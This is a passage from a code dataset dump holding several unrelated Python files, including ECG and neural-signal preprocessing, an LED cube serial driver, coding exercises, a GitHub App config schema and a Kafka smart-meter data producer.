'C:\\\\Users\\\\liuNian\\\\PycharmProjects\\\\PaperTime'\ntest_path = 'C:\\\\Users\\\\WeiLong\\\\PycharmProjects\\\\01-16\\\\sample2017\\\\validation'\ndef label2num(element):\n if element == 'N':\n return 0\n elif element == 'O':\n return 1\n elif element == 'A':\n return 2\n elif element == '~':\n return 3\n\n# def label2onehot_ex(element):\n# if element == '1':\n# return [1,0,0,0,0]\n# elif element == '2':\n# return [0,1,0,0,0]\n# elif element == '3':\n# return [0,0,1,0,0]\n# elif element == '4':\n# return [0,0,0,1,0]\n# elif element == '5':\n# return [0,0,0,0,1]\n\ndef normalization(array):\n # mean = np.mean(array)\n # std = np.std(array,axis=0)\n # newarray = (array - mean) / std\n # return np.reshape(newarray,[-1])\n return preprocessing.scale(array)\n\n\n# def get_label(label_path):\n#\n# def read_labels(label_path):\n# labels = []\n# with open(label_path) as file:\n# read = csv.reader(file)\n# for label_ in read:\n# labels.append(label_)\n# return labels\n#\n# labels = read_labels(label_path)\n# row = len(labels)\n# label = []\n# for i in range(row):\n# label.append(label2onehot(labels[i][1]))\n# return label\n\ndef get_label_For_DataSet(path):\n label = {}\n with open(path) as file:\n reader = csv.reader(file)\n for i in reader:\n label[i[0]] = label2num(i[1])\n return label\n\n\ndef get_mod(Size, cover, origin_length):\n cycle = Size - cover\n length = 0\n while (1):\n if length == 0:\n left = origin_length // Size\n right = origin_length % Size\n else:\n left = origin_length // cycle\n right = origin_length % cycle\n length += 1\n if left == 1:\n if right == 0:\n return length\n else:\n if right < (cycle / 2):\n return length\n else:\n return length + 1\n else:\n if left == 0:\n return -1\n if length == 1:\n origin_length -= Size\n else:\n origin_length -= cycle\n\ndef padding_zero(data, right, size, cover):\n if right != 0:\n pad_length = size - cover - right\n data = np.lib.pad(data, (0, pad_length), 'constant', constant_values=(0, 0))\n return data\n\ndef preprocessTrainData(train_path):\n label = get_label_For_DataSet(os.path.join(train_path, 'REFERENCE.csv'))\n train_mat = os.listdir(train_path)\n train_data = []\n train_label = []\n for i in train_mat:\n if '.mat' in i:\n file = sio.loadmat(os.path.join(train_path, i))\n normalized_data = normalization(file['val'][0])\n train_data.append(normalized_data)\n #print(len(normalized_data))\n file_index = i[0:6]\n train_label.append(label[file_index])\n return train_data,train_label\n\ndef preprocessTestData(test_path):\n label = get_label_For_DataSet(os.path.join(test_path, 'REFERENCE.csv'))\n mat = os.listdir(test_path)\n test_data = []\n test_label = []\n for i in mat:\n if '.mat' in i:\n file = sio.loadmat(os.path.join(test_path, i))\n data = normalization(file['val'][0])\n test_data.append(data)\n file_index = i[0:6]\n test_label.append(label[file_index])\n return test_data,test_label\n\ndef readTrain(train_path,Size=300,cover=50):\n train_data, train_label = preprocessTrainData(train_path)\n train_length = []\n #########train_length#########\n for i in train_data:\n train_length.append(get_mod(Size,cover,len(i)))\n Max = Size + (np.max(train_length)-1)*(Size-cover)\n for i in range(len(train_data)):\n train_data[i] = np.lib.pad(train_data[i],(0,np.max((0,Max-len(train_data[i])))),'constant',constant_values=(0,0))\n new_train = []\n start = 0\n for index in range(len(train_data)):\n for i in range(np.max(train_length)):\n if i == 0:\n end = start + Size\n new_train.append(train_data[index][start:end])\n else:\n start = end - cover\n end = start + Size\n new_train.append(train_data[index][start:end])\n train = []\n assert len(train_data) == len(train_label)\n for i in range(len(train_data)):\n train.append((train_data[i],train_label[i],train_length[i]))\n return train\n\ndef readTest(test_path,Size=300,cover=50):\n test_data, test_label = preprocessTestData(test_path)\n test_length = []\n # #---Test---\n # for i in train_data:\n # print(len(i))\n ######test_length########\n for i in test_data:\n test_length.append(get_mod(Size, cover, len(i)))\n Max = Size + (np.max(test_length)-1)*(Size-cover)\n for i in range(len(test_data)):\n test_data[i] = np.lib.pad(test_data[i],(0, np.max((0,Max-len(test_data[i])))), 'constant', constant_values=(0,0))\n # # ---Test---\n # for i in test_data:\n # print(len(i))\n new_test = []\n start = 0\n for index in range(len(test_data)):\n for i in range(np.max(test_length)):\n if i == 0:\n end = start + Size\n new_test.append(test_data[index][start:end])\n else:\n start = end - cover\n end = start + Size\n new_test.append(test_data[index][start:end])\n test = []\n for i in range(len(test_data)):\n test.append((test_data[i],test_label[i],test_length[i]))\n # #---Test----\n # for i in train:\n # last = Size + (i[2]-1)*(Size-cover)\n # print(i[0][-last-30:-last],': ',i[2])\n # print(len(train))\n return test\n\n\n#train = readTrain(train_path,Size=300,cover=0)\n#test = readTest(test_path,Size=300,cover=0)\n#for i in train:\n# print(i[0].shape,' ',i[1],' ',i[2])\n#print(len(train))","repo_name":"tensor-group/TT","sub_path":"read_utill.py","file_name":"read_utill.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19115778347","text":"from .config import DISPLAY_FILE\nimport os\n\ndef open_read(path):\n f = open(path, 'rb')\n while True:\n l = f.readline()\n if l == b'READY\\n':\n print(\"Starting...\")\n return f\n\nclass Display:\n \"\"\"This Display is used for smaller cubes and groups of LEDs.\n\n It uses a different format from the main server, but can be useful when testing small numbers of LEDs.\n\n It requires an arduino running arduino/led_controller.ino to be connected to /dev/ttyUSB0, at 115200 baud.\n \"\"\"\n def __init__(self, path = DISPLAY_FILE):\n self.path = path\n os.system('stty -F ' + path + ' cs8 115200 ignbrk -brkint -icrnl -imaxbel -opost -onlcr -isig -icanon -iexten -echo -echoe -echok -echoctl -echoke noflsh -ixon -crtscts')\n self.readfile = open_read(path)\n self.writefile = open(path, 'wb')\n\n def display(self, colours):\n data = bytearray(4 + 3 * len(colours))\n data[0] = ord('G')\n data[1] = ord('O')\n data[2] = ord(':')\n data[3] = len(colours) * 3\n for i in range(len(colours)):\n data[4+3*i] = colours[i].r\n data[4+3*i+1] = colours[i].g\n data[4+3*i+2] = colours[i].b\n self.writefile.write(data)\n self.writefile.flush()\n # Wait for the cube to finish sending the data to the LEDs.\n # It sends back the \"GO:\" we sent it when it is ready for more data.\n self.readfile.read(3)\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.writefile.close()\n self.readfile.close()\n\n","repo_name":"abryant/LED-Cube","sub_path":"display/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"18460252412","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef get_balloon_length():\n return int(sys.stdin.readline())\n\ndef read_array(balloon_length):\n return list(map(int, sys.stdin.readline().split(\" \"))) \n\ndef find_intersections(balloon_array):\n intersections = [0] * 1000001\n arrows_needed = 0\n for balloon in balloon_array:\n if intersections[balloon]:\n intersections[balloon] -= 1\n else:\n arrows_needed += 1\n intersections[balloon - 1] += 1\n return arrows_needed\n\ndef main():\n balloon_length = get_balloon_length()\n balloon_array = read_array(balloon_length)\n print(find_intersections(balloon_array))\n\nif __name__ == \"__main__\":\n main()","repo_name":"DrakeCullen/AdvPy-dpcullen","sub_path":"kattis/baloni/baloni.py","file_name":"baloni.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40155252891","text":"import math\nfrom selenium import webdriver\nimport time\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\ntry:\n link = \"http://suninjuly.github.io/get_attribute.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n # нахождение картинки с кладом\n img_treasure = browser.find_element_by_id(\"treasure\")\n\n # получение значения х из значения тега valuex\n x = img_treasure.get_attribute(\"valuex\")\n\n # вычисление значения функции calc от х\n y = calc(x)\n\n # заполнение полученного значения функции в текстовое поле\n answer = browser.find_element_by_id(\"answer\")\n answer.send_keys(str(y))\n\n # нажатие на флажок (чекбокс) \"I'am the robot\"\n robot_checkbox = browser.find_element_by_id(\"robotCheckbox\")\n robot_checkbox.click()\n\n # выбор переключателя (radiobutton) \"Robots rule\"\n people_rule = browser.find_element_by_id(\"robotsRule\")\n people_rule.click()\n\n # нажатие на кнопку \"Submit\" (\"Подтвердить\")\n button_submit = browser.find_element_by_css_selector(\"[type='Submit']\")\n button_submit.click()\n\n\nfinally:\n # задержка 10 секунд\n time.sleep(10)\n # закрытие браузера\n browser.quit()\n","repo_name":"Lion-78/Selenium-Python-course","sub_path":"lesson2_1_step7.py","file_name":"lesson2_1_step7.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33894646576","text":"from psana import DataSource\nimport sys\n\nexp = sys.argv[1]\nrun = sys.argv[2]\ndetname = sys.argv[3]\n\nxtc_dir = \"/reg/d/psdm/xpp/xpptut15/scratch/mona/%s\"%(exp)\nds = DataSource('exp=%s:run=%s:dir=%s'%(exp, run, xtc_dir))\ndet = eval('ds._configs[0].software.%s'%(detname))\ndettype = det.dettype\ndetid = det.detid\nprint(dettype, detid)\n","repo_name":"monarin/psana-nersc","sub_path":"demo18/get_det.py","file_name":"get_det.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7086811361","text":"import csv,os,sys\nfrom CSV_Handler import CSV_Handler\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\n\ndef test_e1(k,a):\n return a/k**2\n\n\"\"\"\n Calculations for conversion between different optical constants\n\"\"\"\n\ndef calculate_s2_interp(interp_fxn_obj):\n k = np.arange(100,10000,1)\n temp_interp_obj = {}\n for temp in interp_fxn_obj.keys():\n temp_interp_obj[temp] = {}\n for opt in interp_fxn_obj[temp].keys():\n if 's1' in opt:\n axis = opt[-1]\n s1 = interp_fxn_obj[temp]['s1'+axis](k)\n inv_tau = interp_fxn_obj[temp]['tau-1'+axis](k)\n s2 = k*s1/inv_tau\n temp_interp_obj[temp]['s2'+axis] = interp1d(k, s2,kind='cubic')\n for temp in temp_interp_obj.keys():\n for opt in temp_interp_obj[temp].keys():\n interp_fxn_obj[temp][opt] = temp_interp_obj[temp][opt]\n\ndef calculate_eps_interp_from_sig(interp_fxn_obj):\n k = np.arange(100,10000,1)\n for temp in interp_fxn_obj.keys():\n s1a = interp_fxn_obj[temp]['s1a'](k)\n s2a = interp_fxn_obj[temp]['s2a'](k)\n s1b = interp_fxn_obj[temp]['s1b'](k)\n s2b = interp_fxn_obj[temp]['s2b'](k)\n sa = s1a+1j*s2a\n sb = s1b+1j*s2b\n epsa = (59.9585)*(1j)*sa/k\n epsb = (59.9585)*(1j)*sb/k\n e1a = np.real(epsa)\n e2a = np.imag(epsa)\n e1b = np.real(epsb)\n e2b = np.imag(epsb)\n interp_fxn_obj[temp]['e1a'] = interp1d(k,e1a,kind='cubic')\n interp_fxn_obj[temp]['e2a'] = interp1d(k,e2a,kind='cubic')\n interp_fxn_obj[temp]['e1b'] = interp1d(k,e1b,kind='cubic')\n interp_fxn_obj[temp]['e2b'] = interp1d(k,e2a,kind='cubic')\n\ndef calculate_epsab_interp_from_eps(interp_fxn_obj):\n k = np.arange(100,10000,1)\n for temp in interp_fxn_obj.keys():\n e1a = interp_fxn_obj[temp]['e1a'](k)\n e2a = interp_fxn_obj[temp]['e2a'](k)\n e1b = interp_fxn_obj[temp]['e1b'](k)\n e2b = interp_fxn_obj[temp]['e2b'](k)\n e1ab = (e1a+e1b)/2\n e2ab = (e2a+e2b)/2\n interp_fxn_obj[temp]['e1ab'] = interp1d(k,e1ab,kind='cubic')\n interp_fxn_obj[temp]['e2ab'] = interp1d(k,e2ab,kind='cubic')\n\ndef calculate_eps_interp_from_n_k(ks,total_data_obj,interp_fxn_obj):\n for temp in interp_fxn_obj.keys():\n kn = total_data_obj[temp]['k_n']\n kk = total_data_obj[temp]['k_k']\n n = np.interp(ks,kn,interp_fxn_obj[temp]['n'](kn))\n k = np.interp(ks,kk,interp_fxn_obj[temp]['k'](kk))\n\n e1 = n**2-k**2\n e2 = 2*n*k\n\n interp_fxn_obj[temp]['e1'] = interp1d(ks,e1,kind='cubic')\n interp_fxn_obj[temp]['e2'] = interp1d(ks,e2,kind='cubic')\n\n\"\"\"\n Function for creating a datasheet for input temperatures & optical constants\n\"\"\"\n\ndef create_datasheet(fname,temp,k,opt_consts,interp_fxn_obj,ec_const=False):\n opt_const_values = []\n\n for opt in opt_consts:\n if ec_const:\n if opt=='e1c':\n opt_const_values.append(np.full(len(k),5))\n elif opt=='e2c':\n opt_const_values.append(np.full(len(k),0.1))\n else:\n opt_const_values.append(interp_fxn_obj[temp][opt](k))\n else:\n if opt!='e2':\n opt_const_values.append(interp_fxn_obj[temp][opt](k))\n else:\n cleaned_e2 = interp_fxn_obj[temp][opt](k)\n cleaned_e2[cleaned_e2<0] = 0\n opt_const_values.append(cleaned_e2)\n\n with open('./Collated_Data/'+fname, mode='w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n i=0\n for i in range(len(k)):\n row = [k[i]]\n for opt_values in opt_const_values:\n row.append(opt_values[i])\n writer.writerow(row)\n i+=1\n\n\"\"\"\n Functions for interpolating and extrapolating optical constants\n\"\"\"\n\ndef interpolate(total_data,interp_fxn):\n for temp in total_data.keys():\n print(temp)\n interp_fxn[temp] = {}\n for opt in total_data[temp].keys():\n if 'k_' not in opt:\n print('\\tInterpolating '+opt)\n x = total_data[temp]['k_'+opt]\n y = total_data[temp][opt]\n interp_fxn[temp][opt] = interp1d(x,y, kind='cubic', fill_value=(y[0],y[-1]), bounds_error=False)\n\ndef extrapolate(ext_range, ext_k, ext_fxn, temps, opts, total_data_obj,p0=None):\n for temp in temps:\n for opt in opts:\n x_data,y_data = [],[]\n for i,k in enumerate(total_data_obj[temp]['k_'+opt]):\n if k>ext_range[0] and k first element of the array.\n# All the elements to the right of inflection point < first element of the array.\n'''\nAlgorithm\n\nFind the mid element of the array.\n\nIf mid element > first element of array this means that we need to look for the inflection point on the right of mid.\n\nIf mid element < first element of array this that we need to look for the inflection point on the left of mid.\n'''\n\nclass Solution(object):\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # If the list has just one element then return that element.\n if len(nums) == 1:\n return nums[0]\n\n # left pointer\n left = 0\n # right pointer\n right = len(nums) - 1\n\n # if the last element is greater than the first element then there is no rotation.\n # e.g. 1 < 2 < 3 < 4 < 5 < 7. Already sorted array.\n # Hence the smallest element is first element. A[0]\n if nums[right] > nums[0]:\n return nums[0]\n\n # Binary search way\n while right >= left:\n # Find the mid element\n mid = left + (right - left) / 2\n # if the mid element is greater than its next element then mid+1 element is the smallest\n # This point would be the point of change. From higher to lower value.\n if nums[mid] > nums[mid + 1]:\n return nums[mid + 1]\n # if the mid element is lesser than its previous element then mid element is the smallest\n if nums[mid - 1] > nums[mid]:\n return nums[mid]\n\n # if the mid elements value is greater than the 0th element this means\n # the least value is still somewhere to the right as we are still dealing with elements greater than nums[0]\n if nums[mid] > nums[0]:\n left = mid + 1\n # if nums[0] is greater than the mid value then this means the smallest value is somewhere to the left\n else:\n right = mid - 1\n\nnums = [3,4,5,1,2]\nprint(findMin(nums))\nnums = [4,5,6,7,0,1,2]\nprint(findMin(nums))\nnums = [11,13,15,17]\nprint(findMin(nums))","repo_name":"qscez2001/leetcode","sub_path":"153.Rotated_Sorted_array.py","file_name":"153.Rotated_Sorted_array.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18674392545","text":"\"\"\"\nPrac 5\n\"\"\"\n\n\ndef main():\n global fullname\n email_to_name = {}\n email = input(\"Email:\")\n while email != \"\":\n find_name(email)\n email_to_name[email] = fullname\n email = input(\"Email:\")\n for email, fullname in email_to_name.items():\n print(f\"{fullname} ({email})\")\n\n\ndef find_name(email):\n global fullname\n name = email.split(\"@\")[0]\n name = name.split(\".\")\n try:\n fullname = name[0] + \" \" + name[1]\n fullname = fullname.title()\n print(f\"Is your name: {fullname}?\")\n except IndexError:\n print(f\"Is your name: {name}?\")\n answer = input(\"Y/N: \").upper()\n if answer.startswith(\"N\"):\n fullname = input(\"Name:\")\n\n\nmain()\n","repo_name":"Blake0982/cp1404practicals","sub_path":"prac_05/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"835894175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 13 16:32:59 2015\n\n@author: Jason\n\"\"\"\n\nimport paths\nimport numpy\nimport cPickle\nimport csv\n#%% Read Data\n\nids = numpy.loadtxt(paths.pathToFBANKTrain,dtype='str_',usecols=(0,))\nf = file(paths.pathToSaveFBANKTrain,'rb')\nfbank_feat = cPickle.load(f)\nf.close()\n\nf = file(paths.pathToSave48Labels,'rb')\nfbank_labels = cPickle.load(f)\nf.close()\n\nphonemes = numpy.loadtxt(paths.pathToChrMap,dtype='str_',usecols=(0,))\nphonId = numpy.loadtxt(paths.pathToChrMap,dtype='int',usecols=(1,))\n\n#%% Extract Utterance\n\nutt_id = 'faem0_si1392'\n\nph48_39 = numpy.loadtxt(paths.pathToMapPhones,dtype='str_',delimiter='\\t')\nph48_39_dict = dict(ph48_39)\nphi_48 = dict(zip(numpy.arange(0,48),ph48_39[:,0]))\nphonemes2id = dict(zip(phonemes,phonId))\n\nfeature_vector = numpy.zeros(shape=(69*48+48*48,))\n\nprocessed = False\npreviousNo = -1\nfor feature, label, frameId in zip(fbank_feat,fbank_labels, ids):\n if not frameId.startswith(utt_id):\n if processed:\n break\n continue\n processed = True\n phoneme = phi_48[label]\n phonemeNo = phonemes2id[phoneme]\n offset = phonemeNo * 69\n for index in range(69):\n feature_vector[offset+index] += feature[index]\n base = 69*48\n if previousNo >= 0:\n offset = previousNo * 48\n feature_vector[offset + base + phonemeNo] += 1\n previousNo = phonemeNo\n \nwith open('hw2a_prediction.csv','wb') as csvfile:\n csvw = csv.writer(csvfile,delimiter=',')\n csvw.writerow(['id','feature'])\n for row in range(feature_vector.shape[0]):\n csvw.writerow([('%s_%i') % (utt_id,row),feature_vector[row]])\n","repo_name":"SYChienIsGod/hw2","sub_path":"hw2a_single_feature_vector_generation.py","file_name":"hw2a_single_feature_vector_generation.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43517599714","text":"\"\"\"Config schema for a GitHub App instance details.\"\"\"\nimport environ\n\n\n# pylint: disable=relative-beyond-top-level\nfrom ..models.utils import SecretStr\n\n\ndef validate_is_not_none_if_app(\n self, # pylint: disable=unused-argument\n attr, value,\n):\n \"\"\"Forbid None value in a GitHub App context.\"\"\"\n # pylint: disable=relative-beyond-top-level\n from ...app.runtime.utils import detect_env_mode\n\n if value is None and detect_env_mode() == 'app':\n raise ValueError(\n f'GitHub App must provide a proper value for {attr!r}',\n )\n\n\n@environ.config # pylint: disable=too-few-public-methods\nclass GitHubAppIntegrationConfig:\n \"\"\"GitHub App auth related config.\"\"\"\n\n app_id = environ.var(\n None,\n name='GITHUB_APP_IDENTIFIER',\n validator=validate_is_not_none_if_app,\n )\n private_key = environ.var(\n None,\n name='GITHUB_PRIVATE_KEY',\n converter=SecretStr,\n validator=validate_is_not_none_if_app,\n )\n webhook_secret = environ.var(\n None, name='GITHUB_WEBHOOK_SECRET',\n converter=lambda s: SecretStr(s) if s is not None else s,\n )\n\n app_name = environ.var(None, name='OCTOMACHINERY_APP_NAME')\n app_version = environ.var(None, name='OCTOMACHINERY_APP_VERSION')\n app_url = environ.var(None, name='OCTOMACHINERY_APP_URL')\n\n @property\n def user_agent(self): # noqa: D401\n \"\"\"The User-Agent value to use when hitting GitHub API.\"\"\"\n return f'{self.app_name}/{self.app_version} (+{self.app_url})'\n","repo_name":"olef1r/thisIsBot","sub_path":"venv/lib/python3.7/site-packages/octomachinery/github/config/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22880290840","text":"from confluent_kafka import Producer\nimport socket\nimport time\nimport json\nimport csv\nimport os\nimport glob\nimport configparser\nimport sys\nimport random\nimport avro.schema\nimport avro.io\nimport io\nfrom typing import Tuple, List, Iterator\n\n\ndef load_config(filepath: str) -> Tuple[str, str, str, str, int]:\n \"\"\"\n Load config file.\n\n @param filepath: path to config.ini\n\n @return datapath: path to data folder\n\n @return schemapath: path to schema file\n\n @return brokers: kafka broker addresses\n\n @return topic: kafka topic to write to\n\n @return playbackspeed: how many times faster to playback data\n \"\"\"\n config = configparser.ConfigParser()\n config.read(filepath)\n\n datapath = config['Data']['greend_path']\n schemapath = config['Data']['schema']\n brokers = config['KafkaBrokers']['address']\n topic = config['KafkaBrokers']['topic_rawdata']\n # how many time faster playback\n playbackspeed = int(config['Data']['playback_speed'])\n return datapath, schemapath, brokers, topic, playbackspeed\n\n\ndef house_reader_GREEND(path: str) -> Tuple[List[str], List[str], List[str]]:\n \"\"\"\n Load the GREEND file names into lists.\n\n @param path: the path to the data folder\n\n @return house_list: list of house names\n\n @return filenames: file name list for each house\n\n @return labels: list of appliance names for each house\n \"\"\"\n house_list = sorted(os.listdir(path))\n house_list = [house for house in house_list if \"building\" in house]\n filenames = [[] for _ in range(len(house_list))]\n for hid, house in enumerate(house_list):\n hpath = path + '/' + house\n filenames[hid]=sorted([os.path.basename(x) for x in glob.glob(hpath+\"/dataset_201*.csv\")])\n\n labels = {}\n with open(path + '/labels.json') as json_file:\n labels = json.load(json_file)\n return house_list, filenames, labels\n\n\ndef open_files(house_name: str, filename: str):\n \"\"\"\n Open the file for next day\n\n @rtype fd: file descriptor\n @return fd: next file descriptor\n\n @rtype csviter: iterator\n @return csviter: csv iterator\n \"\"\"\n\n fd = open(datapath + '/' + house_name + '/' + filename, newline='')\n csviter = csv.reader(fd, delimiter=',')\n # skip header\n next(csviter, None)\n return fd, csviter\n\n\ndef fileoffset_init(filenames: List[List[str]], filestart_offset:str) -> List[Iterator[str]]:\n \"\"\"\n For simulating multiple households\n Shift the starting file in the filename iterator given the file offset.\n \"\"\"\n filename_iters = [iter(house) for house in filenames]\n for _ in range(int(filestart_offset)):\n for hid, fiter in enumerate(filename_iters):\n filename = next(fiter, None)\n if not filename:\n filename_iters[hid] = iter(filenames[hid])\n return filename_iters\n\n\ndef avro_encoder(schema, value: dict):\n \"\"\"\n Encode dictionary to avro format with designated schema\n \"\"\"\n writer = avro.io.DatumWriter(schema)\n bytes_writer = io.BytesIO()\n encoder = avro.io.BinaryEncoder(bytes_writer)\n writer.write(value, encoder)\n raw_bytes = bytes_writer.getvalue()\n return raw_bytes\n\n\ndef kafka_init(servers: str, topic: str):\n \"\"\"\n Set up kafka server\n\n @param servers: all the bootstrap servers with ports, seperated with comma\n\n @param topic: the name of the kafka topic\n\n @rtype: object\n @return: kafka producer\n \"\"\"\n conf = {'bootstrap.servers': servers, 'client.id': socket.gethostname(), 'linger.ms': 50, 'batch.num.messages': 5000}\n producer = Producer(conf)\n return producer\n\n\ndef acked(err, msg):\n \"\"\"\n For kafka message acknowledgement\n \"\"\"\n if err is not None:\n print(\"Failed to deliver message: %s: %s\" % (str(msg), str(err)))\n\n\ndef is_number(s: str) -> bool:\n '''\n Check if string is a number\n '''\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\nif __name__ == \"__main__\":\n _, config, filestart_offset, batch_num = sys.argv\n datapath, schemapath, brokers, topic, playbackspeed = load_config(config)\n schema = avro.schema.Parse(open(schemapath).read())\n house_list, filenames, labels = house_reader_GREEND(datapath)\n filename_iters = fileoffset_init(filenames, filestart_offset)\n producer = kafka_init(brokers, topic)\n\n starttime = time.time()\n\n # introduce randomness to the power output\n factor = random.uniform(0.8, 1.2)\n\n # fileds: file descriptors for each house\n # offsets: offset for the current time to the timestamp in the files\n # firsttimes: first timestamp for the current file\n # pretimes: previous timestamp for each house\n # prevalues: previous power values for each house\n # csviters: csv iterator for row reading\n fileds = [None]*len(house_list)\n pretimes = [None]*len(house_list)\n firsttimes = [None]*len(house_list)\n offsets = [None]*len(house_list)\n csviters = [None]*len(house_list)\n prevalues = [[] for _ in range(len(house_list))]\n\n while True:\n for house_id, house_name in enumerate(house_list):\n # timestamp in millisecond\n current_timestamp = int(round(time.time() * 1000))\n # open a new file if reach eof\n if not pretimes[house_id]:\n # close opened file\n if fileds[house_id]:\n fileds[house_id].close()\n filename = next(filename_iters[house_id], None)\n # check if the end of the folder files, return to first file\n if not filename:\n filename_iters[house_id] = iter(filenames[house_id])\n filename = next(filename_iters[house_id])\n fileds[house_id], csviters[house_id] = open_files(house_name, filename)\n entries = next(csviters[house_id], None)\n firsttimes[house_id] = pretimes[house_id] = float(entries[0])*1000\n prevalues[house_id] = [float(x) if is_number(x) else 0 for x in entries[1:]]\n offsets[house_id] = current_timestamp - float(entries[0])*1000\n # check if the current passes the time inteval of the message\n elif (pretimes[house_id] - firsttimes[house_id]) / playbackspeed + offsets[house_id] + firsttimes[house_id] < current_timestamp:\n for idx, power in enumerate(prevalues[house_id]):\n house_serial = '2_' + batch_num + '_' + str(house_id)\n # take care of extra columns\n label = 'unknown' if idx >= len(labels[house_name]) else labels[house_name][idx]\n value = {\"timestamp\": current_timestamp, \"house_id\": house_serial, \"appliance_id\": house_serial + '_' + str(idx), \"appliance_name\": label, \"power\": power * factor}\n #print(value)\n # key: same house in the same kafka partition\n producer.produce(topic, key=house_serial, value=avro_encoder(schema, value), callback=acked)\n entries = next(csviters[house_id], None)\n if entries:\n # deal with ocassionally appearing column headers\n if entries[0] == 'timestamp':\n entries = next(csviters[house_id])\n pretimes[house_id] = float(entries[0])*1000\n prevalues[house_id] = [float(x) if is_number(x) else 0 for x in entries[1:]]\n else:\n pretimes[house_id] = None\n # asychronous producer\n producer.poll(0)\n","repo_name":"linkevinlin1/Insight_DE_smart_grid","sub_path":"ingestion/producer_GREEND_avro.py","file_name":"producer_GREEND_avro.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"37417987055","text":"import numpy as np\nfrom numpy.typing import ArrayLike\nfrom fooof import FOOOF\nfrom fooof.sim.gen import gen_aperiodic\nfrom scipy import signal\nfrom typing import List, Tuple\nfrom matplotlib import pyplot as plt\n\n\ndef get_stim_timestamps(sync_ch: np.ndarray, expected_pulses: int) -> np.ndarray:\n \"\"\"\n Get indexes of only threshold crossing up from 0 to 1.\n Sometimes there are spurious signals on the stimulation channel, when the stimulator turns off.\n This function trims to the expected number of pulses.\n :param sync_ch: the stimulation sync channel data\n :param expected_pulses: number of expected pulses\n :return: trimmed indexes\n \"\"\"\n threshold_crossing = np.diff(sync_ch > 0, prepend=False)\n idxs_edges = np.where(threshold_crossing)[0]\n stim_starts = idxs_edges[::2]\n stim_starts_trimmed = stim_starts[:expected_pulses]\n\n return stim_starts_trimmed\n\n\ndef get_median_distance(a: ArrayLike) -> float:\n \"\"\"\n Gets median distance between points\n :param a: array-like data\n :return: median\n \"\"\"\n distances = []\n for i in range(len(a) - 1):\n distances.append(a[i] - a[i + 1])\n return abs(np.median(distances))\n\n\ndef running_mean(x: ArrayLike, n: int) -> ArrayLike:\n \"\"\"\n Returns the running mean with window n\n :param x: data\n :param n: window size\n :return: smoothed data\n \"\"\"\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[n:] - cumsum[:-n]) / float(n)\n\n\ndef trim_equal_len(raw: List[ArrayLike]) -> List[float]:\n \"\"\"\n Trims a list of arrays to all have the same length.\n :param raw: raw data\n :return: list with trimmed data\n \"\"\"\n lens = [len(r) for r in raw]\n equaled = [r[:min(lens)] for r in raw]\n return equaled\n\n\ndef parse_raw(raw: np.ndarray, stimulation_idxs: np.ndarray, time_before_stim: int,\n skip_one: bool = False) -> np.ndarray:\n \"\"\"\n Parses the signal given the timestamp of the stimulation.\n :param raw: rawdata of one channel\n :param stimulation_idxs: indexes of the stimulation onset\n :param time_before_stim: how much before the stimulation onset to parse\n :param skip_one: if True parses every second stimulation\n :return: parsed raw signal into an array of equally sized chunks\n \"\"\"\n stimulation_idxs = stimulation_idxs + time_before_stim\n if skip_one:\n stimulation_idxs = stimulation_idxs[::2]\n # skip first chunk that precedes the first stimulation to avoid cropping errors\n split_raw = np.split(raw, stimulation_idxs)[1:]\n leveled_list = trim_equal_len(split_raw)\n trimmed_array = np.vstack(leveled_list)\n return trimmed_array\n\n\ndef get_average_amplitudes(parsed_raw, tested_amplitudes, pulses_number):\n \"\"\"\n Assumes an experiment where a sequence of stimulation amplitudes are applied,\n every stimulation with a fixed number of pulses\n\n :param parsed_raw:\n :param tested_amplitudes:\n :param pulses_number:\n :return:\n \"\"\"\n number_tested_amplitudes = len(tested_amplitudes)\n averaged_amplitudes = []\n for i in range(number_tested_amplitudes):\n start = i * pulses_number\n stop = (i + 1) * pulses_number\n averaged_amp = average_subset(parsed_raw, start, stop)\n averaged_amplitudes.append(averaged_amp)\n return averaged_amplitudes\n\n\ndef average_subset(array: ArrayLike, start: int, stop: int) -> np.ndarray:\n \"\"\"\n Averages a subset of elements\n :param array: input array\n :param start: start idx for parsing\n :param stop: stop idx for parsing\n :return: average of the subset\n \"\"\"\n parsed = array[start:stop]\n averaged = np.mean(parsed, axis=0)\n return averaged\n\n\ndef get_fooofed_psd(freqs: ArrayLike, psd: ArrayLike, frange: List[int] = None) -> (ArrayLike, ArrayLike):\n \"\"\"\n Computes the difference from the power spectrum and the aperiodic 